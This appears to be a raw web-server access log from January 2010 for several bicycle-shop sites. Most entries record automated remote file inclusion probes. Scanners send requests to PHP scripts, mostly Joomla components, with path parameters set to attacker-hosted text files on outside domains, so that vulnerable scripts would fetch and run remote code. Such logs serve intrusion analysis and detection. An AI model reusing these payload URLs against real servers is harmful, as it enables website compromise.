217.16.1.22 - - [10/Jan/2010:20:34:48 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
99.53.248.44 - - [10/Jan/2010:20:41:43 -0800] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.svbikes.com"
99.53.248.44 - - [10/Jan/2010:20:41:44 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.svbikes.com"
218.145.29.142 - - [10/Jan/2010:20:50:38 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:20:50:38 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:20:50:38 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:21:12:49 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:21:12:49 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:21:12:49 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.193.75 - - [10/Jan/2010:21:21:22 -0800] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
119.63.193.75 - - [10/Jan/2010:21:23:24 -0800] "GET /bullitinboard/viewtopic.php?p=2643 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
67.195.111.183 - - [10/Jan/2010:21:24:01 -0800] "GET /translations/Swedish.txt HTTP/1.0" 200 31485 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
222.122.26.58 - - [10/Jan/2010:21:31:37 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:21:31:37 -0800] "GET /translations/Dutch.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:21:31:37 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:21:32:21 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [10/Jan/2010:21:33:12 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
218.145.29.142 - - [10/Jan/2010:21:38:05 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:21:38:05 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 2377 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:21:38:05 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1767 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:21:49:52 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:21:49:52 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [10/Jan/2010:21:55:28 -0800] "GET /http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.195.115.221 - - [10/Jan/2010:22:00:23 -0800] "GET /?N=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
200.93.147.154 - - [10/Jan/2010:22:01:21 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:01:21 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:01:21 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:01:21 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:02:22 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:02:22 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:02:22 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:02:23 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:02:23 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:02:23 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:02:25 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:02:27 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [10/Jan/2010:22:07:39 -0800] "GET /logs/access.log/http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
64.62.128.254 - - [10/Jan/2010:22:07:39 -0800] "GET /http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
64.62.128.254 - - [10/Jan/2010:22:07:40 -0800] "GET /logs/http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:09:58 -0800] "GET /logs/access.log//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:09:58 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:09:58 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:10:05 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:10:07 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:10:07 -0800] "GET /logs/access.log//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:13:53 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:13:53 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:13:54 -0800] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:16:00 -0800] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:16:00 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:16:02 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.130.149.241 - - [10/Jan/2010:22:21:30 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.130.149.241 - - [10/Jan/2010:22:21:30 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.130.149.241 - - [10/Jan/2010:22:21:30 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.24.35.80 - - [10/Jan/2010:22:24:52 -0800] "GET /forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.24.35.80 - - [10/Jan/2010:22:24:52 -0800] "GET /logs//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.24.35.80 - - [10/Jan/2010:22:24:52 -0800] "GET /logs/access.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:26:03 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:26:03 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.24.35.80 - - [10/Jan/2010:22:26:44 -0800] "GET /forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.24.35.80 - - [10/Jan/2010:22:26:44 -0800] "GET /logs/access.log//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.24.35.80 - - [10/Jan/2010:22:26:44 -0800] "GET /logs//forum//?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:26:45 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:26:45 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:26:58 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Jan/2010:22:26:58 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.hotelmoulin.com/db/icon/aa.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:22:28:08 -0800] "GET /logs/access.log/?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:22:28:08 -0800] "GET /?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
71.250.232.26 - - [10/Jan/2010:22:28:09 -0800] "GET /logs/?sourcedir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:29:11 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:29:11 -0800] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:29:11 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:30:14 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:30:14 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:22:30:17 -0800] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:22:51:28 -0800] "GET /mosConfig_absolute_%20%20%20path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:22:51:28 -0800] "GET /logs/access.log%20%20/mosConfig_absolute_%20%20%20path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:22:51:28 -0800] "GET /logs/mosConfig_absolute_%20%20%20path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:22:53:07 -0800] "GET /logs/mosConfig_absolute_%20%20%20path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:22:53:07 -0800] "GET /logs/access.log%20%20/mosConfig_absolute_%20%20%20path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:22:53:07 -0800] "GET /mosConfig_absolute_%20%20%20path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:22:55:31 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:22:55:31 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:22:55:31 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.90.98.94 - - [10/Jan/2010:22:59:05 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.90.98.94 - - [10/Jan/2010:22:59:05 -0800] "GET /logs/access.log//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.90.98.94 - - [10/Jan/2010:22:59:05 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:02:10 -0800] "GET /tsm.co.id/deperindag/=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:02:10 -0800] "GET /logs/access.log%20%20//tsm.co.id/deperindag/=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:02:10 -0800] "GET /logs//tsm.co.id/deperindag/=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:02:38 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:02:38 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:02:41 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:09:54 -0800] "GET /tsm.co.id/deperindag/SERVER[DOCUMENT_ROOT]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:09:54 -0800] "GET /logs//tsm.co.id/deperindag/SERVER[DOCUMENT_ROOT]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:09:55 -0800] "GET /logs/access.log%20%20//tsm.co.id/deperindag/SERVER[DOCUMENT_ROOT]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:11:36 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:11:36 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:11:36 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.19.215.158 - - [10/Jan/2010:23:15:46 -0800] "GET /logs/access.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.19.215.158 - - [10/Jan/2010:23:15:47 -0800] "GET /?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
189.19.215.158 - - [10/Jan/2010:23:15:47 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:21:58 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:21:58 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:21:58 -0800] "GET /appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:22:07 -0800] "GET /appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:22:07 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:22:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:22:24 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:22:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:22:24 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:45 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:45 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:45 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
